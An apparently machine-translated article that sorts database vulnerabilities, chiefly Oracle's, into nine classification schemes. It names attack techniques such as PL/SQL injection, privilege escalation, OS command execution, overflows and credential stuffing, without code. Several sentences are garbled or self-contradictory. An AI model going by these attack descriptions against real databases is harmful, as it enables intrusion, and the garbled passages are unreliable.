Analyze database security vulnerabilities from nine perspectives

Analyze database security vulnerabilities from nine perspectives

Database vulnerabilities exist in multiple ways. Because each actual scenario is composed of multiple dimensions, database vulnerabilities can be classified from different perspectives. This classification helps us to master the protection technologies for each vulnerability.

‍‍‍‍‍‍Anhua gold and the database security lab classify database vulnerabilities from the following nine perspectives:‍‍‍‍

‍‍1. Divide the scope of the Vulnerability

‍‍‍‍Remote Vulnerabilities: vulnerabilities that attackers can exploit and directly launch database attacks through the network. This type of vulnerability is extremely harmful. Attackers can exploit this vulnerability as they wish to harm databases that can be identified on the Internet. These vulnerabilities are the main cause for hackers to exploit them.

‍‍‍‍‍‍Local Attack: A vulnerability that can be exploited only when the attacker has access to the local machine. Typical vulnerabilities include local privilege escalation. These vulnerabilities are widely used in databases, allowing common users to gain the highest administrator privilege.‍‍

‍‍‍‍2. Vulnerability hazard levels

‍‍‍‍Vulnerability hazard levels are divided into three levels based on CVE scores: 0-3 (LOW), 4-6 (MEDIUM), and 7-10 (HIGH ). The classification of hazard levels of holes is based on the impact of a vulnerability on the database. The greater the impact on the confidentiality, security, and availability of the database, the higher the threat level, and the lower the risk level. Example:

CVE-2006-1705 hazard levels are low. It has no impact on database system files, and may cause some configuration files in the database to be modified, without affecting database operation.

CVE-2006-1871 hazard level is in. It is only likely to cause some information leakage, may cause some database configuration files to be modified, may lead to database performance decline or a small probability of broken links.

CVE-2006-3702 hazard levels are high. It can cause all database system files to be leaked, the database is completely damaged, and the database may be completely down.

‍‍3. Division from affected systems

‍‍‍‍The existing operating systems are diverse, and each system has multiple versions. The operating system is divided into the following five categories: dos, windows, unix, linux, and other operating systems. Because the vulnerability injection point address has a direct relationship with the specific version of the operating system, you need to divide it according to the specific version of the operating system. Taking oracle as an example, because different operating systems have different defensive mechanisms for buffer overflow, this type of vulnerability basically does not have the possibility of cross-platform access.‍‍

‍‍4. Divide the scope of hazards

‍‍‍‍‍‍Vulnerability hazards are various hazards caused by exploits of vulnerabilities. The harm in this article refers to the direct harm to the database or the harm caused by the use of the database to other systems. These hazards can be divided into three types:

‍‍‍‍‍‍This vulnerability threatens the database itself. It attacks the database itself. These vulnerabilities are described in detail in the section "5. Technical Division of database intrusion by hackers" below.

 

‍‍‍‍This vulnerability harms the server where the database is located and attacks the server through the database. The methods include running OS commands through pl/SQL, running OS commands through JAVA, running OS commands directly through task scheduling, and running OS commands using ALTER SYSTEM, in some versions of oracle, you can use oracle to compile local pl/SQL applications to run OS commands.

 

‍‍This vulnerability threatens the file system of the system where the database is located. It attacks the file system on the server. The methods include using the UTL_FILE package to access the file system, using JAVA to access the file system, and using the operating system environment variables to access the file system.

Hazards other platforms on the network where the database is located. Such vulnerabilities invade other databases and services on the network through the database.

‍‍5. Technical Division from hacking into databases

‍‍‍‍‍‍5.1 SQL Injection

‍‍‍‍‍‍SQL This article says that the SQL injection is not a web end, but a SQL injection vulnerability targeting the database itself. The two are very different. Pl/SQL injection is very simple,

‍‍‍‍In normal SQL statements, malformed strings or other malformed inputs targeting database vulnerabilities or database defects are added by means of embedding, commenting, and escape characters. This malformed input step by step gets higher permissions in the database, and finally gets sensitive information in the database or directly obtains DBA permissions. This may cause harm to the network environment of the database and the local server.

‍‍Methods can be divided:

Code injection. Code injection attacks mostly exist in data that supports execution of Multiple SQL statements. It is attacked by adding malicious EXECUTE commands to normal statements.

Function call injection. Function call injection is a variant of code injection, but it is indeed the core of the entire SQL injection. It uses the database vulnerability to inject malicious statements into it. Specific methods include:

Insert select/delete/insert/update statements

Injection Function

Inject anonymous pl/SQL Blocks

Cursor Injection

Trigger

Lateral elevation Technology

‍‍‍‍‍‍‍‍There are also subdivisions in each technology, for example, the most famous Technology in lateral Elevation of Privilege is that the create ant trigger permission is granted to DBA, the create ant view permission to DBA, The execute any procedure permission to DBA, And the create proceduer permission to DBA.

‍‍‍‍‍‍‍‍‍‍Buffer overflow injection.‍‍‍‍This buffer overflow is not the same as the buffer overflow below. This buffer overflow is a buffer overflow caused by some parameters passed in the database system function that exceed the parameter length limit.

‍‍SQL Injection.‍‍The most common is to use the where clause to modify the SQL statement to return different result sets to obtain sensitive information about the database.

‍‍‍‍5.2 Buffer Overflow

‍‍‍‍‍‍Buffer overflow: the buffer overflow refers to that when the data in the source buffer zone is replicated to a buffer zone smaller than its own number of digits, it is beyond the boundary of the number of digits in the target buffer zone, in addition, the database does not make a boundary judgment on the stored data, which eventually causes the target buffer to be full. The Target Buffer Memory changes the program control flow, captures the operating system, and disables access. Buffer overflow can be divided into four types: static data overflow, stack overflow, heap overflow, and formatted strings.

 

‍‍‍‍‍‍‍‍Methods can be divided:

 

‍‍‍‍‍‍Stack Overflow.‍‍‍‍Buffer overflow is mainly caused by Stack Overflow by using the return value of the truncation function. There are two main methods: one is to change the function logic flow through buffer overflow; the other is to change the function return address through buffer overflow. The second type is common.

‍‍‍‍Heap Overflow.‍‍‍‍Buffer overflow is similar to stack overflow. However, because the address in the heap is dynamically allocated, it cannot be accurately located, therefore, to use heap overflow, hackers need to use dword shoot technology to scan the heap and obtain the addresses available in heap overflow.

‍‍‍‍Static Data zone overflow.‍‍‍‍The static data area stores continuous global variables and uninitialized static variables. Buffer overflow is called static data zone overflow.

‍‍‍‍Format the string.‍‍‍‍The most notable example of the formatting string vulnerability is to output data in * printf () series functions in a certain format. Hackers mainly use the printf () series of functions with three special properties. First, the first available nature is: * printf () the number of parameters of series functions is not fixed. Second, the hacker writes exploit to the memory using a special format character % n of * printf. Again, use the additional format operator to control the value of the jump address.

‍‍‍‍5.3 others

‍‍‍‍Weak password. Generally, passwords that are easily guessed by others or cracked by tools are weak passwords, most of which are default database passwords, some of which are generated by default passwords.

‍‍‍‍Credential stuffing. Access the target database through the collected usernames and passwords registered in other services. As many people are used to using the same password and account, they are more likely to log on to the target database and steal a large amount of sensitive information.‍‍‍‍

Brute force cracking. A Data Dictionary (Password Database) is used to collide with the database user name, and finally the user and password combinations that can be used to access the database are met.‍‍‍‍

6. Identify the cause of database Vulnerabilities

‍‍‍‍Input verification error.‍‍‍‍‍‍‍‍‍‍‍‍This error mainly comes from the lack of correct and reasonable verification of input values such as strings and packages, resulting in malformed input values entering the database system functions, causing unpredictable consequences to the database.

‍‍‍‍‍‍‍‍‍‍‍‍The boundary condition is incorrect.‍‍‍‍Because the database is a large and complex software, the internal function calls of the software are too complex, and sometimes the boundary for an input value may appear. Different restrictions may affect the database.

‍‍‍‍Buffer overflow error.‍‍‍‍Database vulnerabilities are exposed due to the lack of boundary limitations and checks on parameter values in some functions in the database.

‍‍‍‍Access verification error.‍‍‍‍Access verification errors are mainly caused by network monitoring of the database. Hackers send fraud packets to obtain important information about the database.

‍‍‍‍Unexpected condition error.‍‍‍‍Because the logic in the database is complex, some rarely triggered logical branches are not found in time due to software cycle and other reasons.

‍‍‍‍Other errors.‍‍‍‍‍‍In addition to the database vulnerabilities caused by the preceding five types of errors, most of the other errors are caused by the failure to perform operations and configuration according to the database's official requirements when using the database, or a vulnerability caused by a design defect of the database.‍‍‍‍

‍‍7. Classification of vulnerability exploitation results

‍‍‍‍Unauthorized access. Access data that is originally inaccessible, including reading and writing. This is usually the core purpose of an attacker and can cause a very serious disaster (for example, the bank data may be written ).

 

‍‍‍‍Elevation of Privilege. You can escalate the permissions of a Low-Permission user step by step until the user becomes a DBA. Attackers can steal core data from a database using an account that has obtained the permission.

‍‍‍‍Denial of Service. Attackers force the target database to stop providing services, which is one of the common attacks by hackers. The consumable attack on the database port is only a small part of the Denial-of-Service attack. Any attempt to suspend the database service or even crash the host is a Denial-of-Service attack.

‍‍‍‍‍‍Capture the operating system. When a hacker attacks a database through the network, the buffer vulnerability attack will be captured by hijacking the function return values in the stack of the intruded function.‍‍‍‍‍‍Function Control, jump to the shellcode compiled by the hacker. When shellcode enables CMD (windows), you can use a database account to manipulate the operating system, thereby capturing the entire operating system process.

‍‍‍‍Authentication Bypass. Usually use the Authentication System‍‍‍‍‍‍Vulnerabilities are accessible to the system without authorization. Generally, authentication bypass is used to improve permissions or directly access data.‍‍

‍‍‍‍8. Slave Database‍‍Vulnerability location Division

‍‍‍‍Different database similar functions have different names. This document uses oracle as an example to describe how to divide vulnerabilities into TNS (listener) vulnerabilities, Aurora GIOP server vulnerabilities, XDB component vulnerabilities, DBMS_CDC_IMPDP vulnerabilities, LT component vulnerabilities, DBMS_CDC_SUBSCRIBE vulnerabilities, DBMS_CDC_ISUBSCRIBE vulnerabilities, and MDSYS. SDO_GEOM_TRIG_INSI vulnerability, SYS. CDC_DROP_CTABLE_BEFORE, dbms_schrd.pdf, UTL_FILE, Data Redaction, and audit vulnerabilities.‍‍

‍‍‍‍9. Divide the vulnerability Generation Time Series

‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍Vulnerabilities that have been detected for a long time. The database vendor has released patches or repair methods, which many people already know. Many of these vulnerabilities have been modified.‍‍‍‍‍‍Less harmful.

‍‍‍‍‍‍The detected vulnerability. Database Factory‍‍‍‍There are not many people who know the patch or repair method just released by the vendors. Compared with the previous vulnerability, it is harmful.‍‍The Utilization Program of melons will‍‍‍‍‍‍‍‍As a result, a large number of databases are under attack. This is also the most widely used vulnerability by hackers.‍‍‍‍‍‍‍‍‍‍‍‍‍‍

‍‍‍‍0-day vulnerability. There are no public vulnerabilities in private transactions. Such vulnerabilities are usually the most dangerous and often used by organized hackers.